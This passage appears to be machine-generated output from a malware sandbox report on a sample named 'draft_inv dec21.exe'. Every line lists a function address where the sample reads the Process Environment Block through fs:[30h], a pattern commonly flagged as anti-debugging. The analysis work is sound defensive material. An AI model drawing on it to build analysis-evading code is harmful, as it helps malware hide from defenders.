Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E933C57 mov eax, dword ptr fs:[00000030h] 8_2_1E933C57
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADC40 mov eax, dword ptr fs:[00000030h] 8_2_1E8ADC40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C40 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBC6E mov eax, dword ptr fs:[00000030h] 8_2_1E8EBC6E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBC6E mov eax, dword ptr fs:[00000030h] 8_2_1E8EBC6E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACC68 mov eax, dword ptr fs:[00000030h] 8_2_1E8ACC68
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov ecx, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3C60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3C60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B0C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B8C79 mov eax, dword ptr fs:[00000030h] 8_2_1E8B8C79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACD8A mov eax, dword ptr fs:[00000030h] 8_2_1E8ACD8A
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ACD8A mov eax, dword ptr fs:[00000030h] 8_2_1E8ACD8A
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B6D91 mov eax, dword ptr fs:[00000030h] 8_2_1E8B6D91
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A6DA6 mov eax, dword ptr fs:[00000030h] 8_2_1E8A6DA6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2DBC mov eax, dword ptr fs:[00000030h] 8_2_1E8E2DBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E2DBC mov ecx, dword ptr fs:[00000030h] 8_2_1E8E2DBC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ADDB0 mov eax, dword ptr fs:[00000030h] 8_2_1E8ADDB0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B7DB6 mov eax, dword ptr fs:[00000030h] 8_2_1E8B7DB6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984DA7 mov eax, dword ptr fs:[00000030h] 8_2_1E984DA7
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96ADD6 mov eax, dword ptr fs:[00000030h] 8_2_1E96ADD6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96ADD6 mov eax, dword ptr fs:[00000030h] 8_2_1E96ADD6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A8DCD mov eax, dword ptr fs:[00000030h] 8_2_1E8A8DCD
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E95FDF4 mov eax, dword ptr fs:[00000030h] 8_2_1E95FDF4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BBDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8BBDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFDE0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DFDE0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEDFA mov eax, dword ptr fs:[00000030h] 8_2_1E8AEDFA
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97CDEB mov eax, dword ptr fs:[00000030h] 8_2_1E97CDEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97CDEB mov eax, dword ptr fs:[00000030h] 8_2_1E97CDEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8BAD00 mov eax, dword ptr fs:[00000030h] 8_2_1E8BAD00
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D0D01 mov eax, dword ptr fs:[00000030h] 8_2_1E8D0D01
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCD10 mov eax, dword ptr fs:[00000030h] 8_2_1E8DCD10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DCD10 mov ecx, dword ptr fs:[00000030h] 8_2_1E8DCD10
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BD08 mov eax, dword ptr fs:[00000030h] 8_2_1E96BD08
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96BD08 mov eax, dword ptr fs:[00000030h] 8_2_1E96BD08
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E948D0A mov eax, dword ptr fs:[00000030h] 8_2_1E948D0A
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8AFD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov ecx, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DAD20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DAD20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h] 8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h] 8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h] 8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E960D24 mov eax, dword ptr fs:[00000030h] 8_2_1E960D24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h] 8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h] 8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8CDD4D mov eax, dword ptr fs:[00000030h] 8_2_1E8CDD4D
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A9D46 mov eax, dword ptr fs:[00000030h] 8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A9D46 mov eax, dword ptr fs:[00000030h] 8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A9D46 mov ecx, dword ptr fs:[00000030h] 8_2_1E8A9D46
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931D5E mov eax, dword ptr fs:[00000030h] 8_2_1E931D5E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92CD40 mov eax, dword ptr fs:[00000030h] 8_2_1E92CD40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E92CD40 mov eax, dword ptr fs:[00000030h] 8_2_1E92CD40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984D4B mov eax, dword ptr fs:[00000030h] 8_2_1E984D4B
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975D43 mov eax, dword ptr fs:[00000030h] 8_2_1E975D43
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E975D43 mov eax, dword ptr fs:[00000030h] 8_2_1E975D43
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1D50 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1D50 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1D50
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C5D60 mov eax, dword ptr fs:[00000030h] 8_2_1E8C5D60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E956D79 mov esi, dword ptr fs:[00000030h] 8_2_1E956D79
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E935D60 mov eax, dword ptr fs:[00000030h] 8_2_1E935D60
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E985D65 mov eax, dword ptr fs:[00000030h] 8_2_1E985D65
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBD71 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBD71
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EBD71 mov eax, dword ptr fs:[00000030h] 8_2_1E8EBD71
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8ABA80 mov eax, dword ptr fs:[00000030h] 8_2_1E8ABA80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E966A80 mov eax, dword ptr fs:[00000030h] 8_2_1E966A80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E957ABE mov eax, dword ptr fs:[00000030h] 8_2_1E957ABE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h] 8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h] 8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9ABF mov eax, dword ptr fs:[00000030h] 8_2_1E8E9ABF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96DAAF mov eax, dword ptr fs:[00000030h] 8_2_1E96DAAF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0ACE mov eax, dword ptr fs:[00000030h] 8_2_1E8C0ACE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C0ACE mov eax, dword ptr fs:[00000030h] 8_2_1E8C0ACE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDAC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDAC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFAEC mov edi, dword ptr fs:[00000030h] 8_2_1E8AFAEC
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h] 8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h] 8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B0AED mov eax, dword ptr fs:[00000030h] 8_2_1E8B0AED
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h] 8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h] 8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8D0AEB mov eax, dword ptr fs:[00000030h] 8_2_1E8D0AEB
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h] 8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h] 8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E930AFF mov eax, dword ptr fs:[00000030h] 8_2_1E930AFF
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B9AE4 mov eax, dword ptr fs:[00000030h] 8_2_1E8B9AE4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E984AE8 mov eax, dword ptr fs:[00000030h] 8_2_1E984AE8
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C3AF6 mov eax, dword ptr fs:[00000030h] 8_2_1E8C3AF6
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EAA0E mov eax, dword ptr fs:[00000030h] 8_2_1E8EAA0E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8EAA0E mov eax, dword ptr fs:[00000030h] 8_2_1E8EAA0E
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93DA31 mov eax, dword ptr fs:[00000030h] 8_2_1E93DA31
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E96DA30 mov eax, dword ptr fs:[00000030h] 8_2_1E96DA30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov eax, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DDA20 mov edx, dword ptr fs:[00000030h] 8_2_1E8DDA20
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1A24 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1A24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B1A24 mov eax, dword ptr fs:[00000030h] 8_2_1E8B1A24
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8A7A30 mov eax, dword ptr fs:[00000030h] 8_2_1E8A7A30
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934A57 mov eax, dword ptr fs:[00000030h] 8_2_1E934A57
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E934A57 mov eax, dword ptr fs:[00000030h] 8_2_1E934A57
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9A48 mov eax, dword ptr fs:[00000030h] 8_2_1E8E9A48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E9A48 mov eax, dword ptr fs:[00000030h] 8_2_1E8E9A48
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DEA40 mov eax, dword ptr fs:[00000030h] 8_2_1E8DEA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DEA40 mov eax, dword ptr fs:[00000030h] 8_2_1E8DEA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AFA44 mov ecx, dword ptr fs:[00000030h] 8_2_1E8AFA44
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93DA40 mov eax, dword ptr fs:[00000030h] 8_2_1E93DA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E94AA40 mov eax, dword ptr fs:[00000030h] 8_2_1E94AA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E94AA40 mov eax, dword ptr fs:[00000030h] 8_2_1E94AA40
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h] 8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h] 8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h] 8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E97BA66 mov eax, dword ptr fs:[00000030h] 8_2_1E97BA66
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E931B93 mov eax, dword ptr fs:[00000030h] 8_2_1E931B93
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E93DB90 mov eax, dword ptr fs:[00000030h] 8_2_1E93DB90
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8C1B80 mov eax, dword ptr fs:[00000030h] 8_2_1E8C1B80
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8E1B9C mov eax, dword ptr fs:[00000030h] 8_2_1E8E1B9C
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h] 8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h] 8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h] 8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E978BBE mov eax, dword ptr fs:[00000030h] 8_2_1E978BBE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8B3BA4 mov eax, dword ptr fs:[00000030h] 8_2_1E8B3BA4
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8AEBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8AEBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E956BDE mov ebx, dword ptr fs:[00000030h] 8_2_1E956BDE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E956BDE mov eax, dword ptr fs:[00000030h] 8_2_1E956BDE
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFBC0 mov ecx, dword ptr fs:[00000030h] 8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DFBC0
Source: C:\Users\user\Desktop\draft_inv dec21.exe Code function: 8_2_1E8DFBC0 mov eax, dword ptr fs:[00000030h] 8_2_1E8DFBC0
